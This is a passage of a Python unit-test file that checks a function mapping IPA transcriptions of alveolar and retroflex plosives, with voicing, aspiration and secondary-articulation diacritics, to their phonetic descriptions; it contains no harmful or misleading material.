def test_t̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̊ˠ")
self.assertEqual(actual, expected)
def test_t̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̥ˠ")
self.assertEqual(actual, expected)
def test_d̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ˠ")
self.assertEqual(actual, expected)
def test_d̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar plosive pulmonic egressive consonant
def test_tˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tˤ")
self.assertEqual(actual, expected)
def test_t̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̊ˤ")
self.assertEqual(actual, expected)
def test_t̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̥ˤ")
self.assertEqual(actual, expected)
def test_d̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ˤ")
self.assertEqual(actual, expected)
def test_d̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar plosive pulmonic egressive consonant
def test_tʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʰ")
self.assertEqual(actual, expected)
def test_d̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʰ")
self.assertEqual(actual, expected)
def test_d̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar plosive pulmonic egressive consonant
def test_tʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʰʷ")
self.assertEqual(actual, expected)
def test_d̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʰʷ")
self.assertEqual(actual, expected)
def test_d̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar plosive pulmonic egressive consonant
def test_tʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʰʲ")
self.assertEqual(actual, expected)
def test_d̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʰʲ")
self.assertEqual(actual, expected)
def test_d̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar plosive pulmonic egressive consonant
def test_tʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʰˠ")
self.assertEqual(actual, expected)
def test_d̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʰˠ")
self.assertEqual(actual, expected)
def test_d̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar plosive pulmonic egressive consonant
def test_tʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʰˤ")
self.assertEqual(actual, expected)
def test_d̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʰˤ")
self.assertEqual(actual, expected)
def test_d̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar plosive pulmonic egressive consonant
def test_d_is_the_representation_of_the_voiced_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d")
self.assertEqual(actual, expected)
def test_t̬_is_the_representation_of_the_voiced_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬")
self.assertEqual(actual, expected)
def test_t̬_is_the_representation_of_the_voiced_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬")
self.assertEqual(actual, expected)
# voiced labialized alveolar plosive pulmonic egressive consonant
def test_dʷ_is_the_representation_of_the_voiced_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʷ")
self.assertEqual(actual, expected)
def test_t̬ʷ_is_the_representation_of_the_voiced_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʷ")
self.assertEqual(actual, expected)
def test_t̬ʷ_is_the_representation_of_the_voiced_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar plosive pulmonic egressive consonant
def test_dʲ_is_the_representation_of_the_voiced_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʲ")
self.assertEqual(actual, expected)
def test_t̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʲ")
self.assertEqual(actual, expected)
def test_t̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar plosive pulmonic egressive consonant
def test_dˠ_is_the_representation_of_the_voiced_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dˠ")
self.assertEqual(actual, expected)
def test_t̬ˠ_is_the_representation_of_the_voiced_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ˠ")
self.assertEqual(actual, expected)
def test_t̬ˠ_is_the_representation_of_the_voiced_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar plosive pulmonic egressive consonant
def test_dˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dˤ")
self.assertEqual(actual, expected)
def test_t̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ˤ")
self.assertEqual(actual, expected)
def test_t̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar plosive pulmonic egressive consonant
def test_dʰ_is_the_representation_of_the_voiced_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʰ")
self.assertEqual(actual, expected)
def test_d̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̬ʰ")
self.assertEqual(actual, expected)
def test_t̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar plosive pulmonic egressive consonant
def test_dʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʰʷ")
self.assertEqual(actual, expected)
def test_d̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̬ʰʷ")
self.assertEqual(actual, expected)
def test_t̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar plosive pulmonic egressive consonant
def test_dʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʰʲ")
self.assertEqual(actual, expected)
def test_d̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̬ʰʲ")
self.assertEqual(actual, expected)
def test_t̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar plosive pulmonic egressive consonant
def test_dʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʰˠ")
self.assertEqual(actual, expected)
def test_d̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̬ʰˠ")
self.assertEqual(actual, expected)
def test_t̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar plosive pulmonic egressive consonant
def test_dʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʰˤ")
self.assertEqual(actual, expected)
def test_d̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̬ʰˤ")
self.assertEqual(actual, expected)
def test_t̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless retroflex plosive pulmonic egressive consonant
def test_ʈ_is_the_representation_of_the_voiceless_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ")
self.assertEqual(actual, expected)
def test_ʈ̊_is_the_representation_of_the_voiceless_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̊")
self.assertEqual(actual, expected)
def test_ʈ̥_is_the_representation_of_the_voiceless_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̥")
self.assertEqual(actual, expected)
def test_ɖ̊_is_the_representation_of_the_voiceless_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊")
self.assertEqual(actual, expected)
def test_ɖ̥_is_the_representation_of_the_voiceless_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥")
self.assertEqual(actual, expected)
# voiceless labialized retroflex plosive pulmonic egressive consonant
def test_ʈʷ_is_the_representation_of_the_voiceless_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʷ")
self.assertEqual(actual, expected)
def test_ʈ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̊ʷ")
self.assertEqual(actual, expected)
def test_ʈ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̥ʷ")
self.assertEqual(actual, expected)
def test_ɖ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʷ")
self.assertEqual(actual, expected)
def test_ɖ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized retroflex plosive pulmonic egressive consonant
def test_ʈʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʲ")
self.assertEqual(actual, expected)
def test_ʈ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̊ʲ")
self.assertEqual(actual, expected)
def test_ʈ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̥ʲ")
self.assertEqual(actual, expected)
def test_ɖ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʲ")
self.assertEqual(actual, expected)
def test_ɖ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized retroflex plosive pulmonic egressive consonant
def test_ʈˠ_is_the_representation_of_the_voiceless_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈˠ")
self.assertEqual(actual, expected)
def test_ʈ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̊ˠ")
self.assertEqual(actual, expected)
def test_ʈ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̥ˠ")
self.assertEqual(actual, expected)
def test_ɖ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ˠ")
self.assertEqual(actual, expected)
def test_ɖ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized retroflex plosive pulmonic egressive consonant
def test_ʈˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈˤ")
self.assertEqual(actual, expected)
def test_ʈ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̊ˤ")
self.assertEqual(actual, expected)
def test_ʈ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̥ˤ")
self.assertEqual(actual, expected)
def test_ɖ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ˤ")
self.assertEqual(actual, expected)
def test_ɖ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated retroflex plosive pulmonic egressive consonant
def test_ʈʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʰ")
self.assertEqual(actual, expected)
def test_ɖ̥ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʰ")
self.assertEqual(actual, expected)
def test_ɖ̊ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized retroflex plosive pulmonic egressive consonant
def test_ʈʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʰʷ")
self.assertEqual(actual, expected)
def test_ɖ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɖ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized retroflex plosive pulmonic egressive consonant
def test_ʈʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʰʲ")
self.assertEqual(actual, expected)
def test_ɖ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɖ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized retroflex plosive pulmonic egressive consonant
def test_ʈʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʰˠ")
self.assertEqual(actual, expected)
def test_ɖ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɖ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized retroflex plosive pulmonic egressive consonant
def test_ʈʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʰˤ")
self.assertEqual(actual, expected)
def test_ɖ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɖ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced retroflex plosive pulmonic egressive consonant
def test_ɖ_is_the_representation_of_the_voiced_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ")
self.assertEqual(actual, expected)
def test_ʈ̬_is_the_representation_of_the_voiced_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬")
self.assertEqual(actual, expected)
def test_ʈ̬_is_the_representation_of_the_voiced_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬")
self.assertEqual(actual, expected)
# voiced labialized retroflex plosive pulmonic egressive consonant
def test_ɖʷ_is_the_representation_of_the_voiced_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʷ")
self.assertEqual(actual, expected)
def test_ʈ̬ʷ_is_the_representation_of_the_voiced_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʷ")
self.assertEqual(actual, expected)
def test_ʈ̬ʷ_is_the_representation_of_the_voiced_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized retroflex plosive pulmonic egressive consonant
def test_ɖʲ_is_the_representation_of_the_voiced_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʲ")
self.assertEqual(actual, expected)
def test_ʈ̬ʲ_is_the_representation_of_the_voiced_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʲ")
self.assertEqual(actual, expected)
def test_ʈ̬ʲ_is_the_representation_of_the_voiced_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized retroflex plosive pulmonic egressive consonant
def test_ɖˠ_is_the_representation_of_the_voiced_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖˠ")
self.assertEqual(actual, expected)
def test_ʈ̬ˠ_is_the_representation_of_the_voiced_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ˠ")
self.assertEqual(actual, expected)
def test_ʈ̬ˠ_is_the_representation_of_the_voiced_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized retroflex plosive pulmonic egressive consonant
def test_ɖˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖˤ")
self.assertEqual(actual, expected)
def test_ʈ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ˤ")
self.assertEqual(actual, expected)
def test_ʈ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated retroflex plosive pulmonic egressive consonant
def test_ɖʰ_is_the_representation_of_the_voiced_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʰ")
self.assertEqual(actual, expected)
def test_ɖ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̬ʰ")
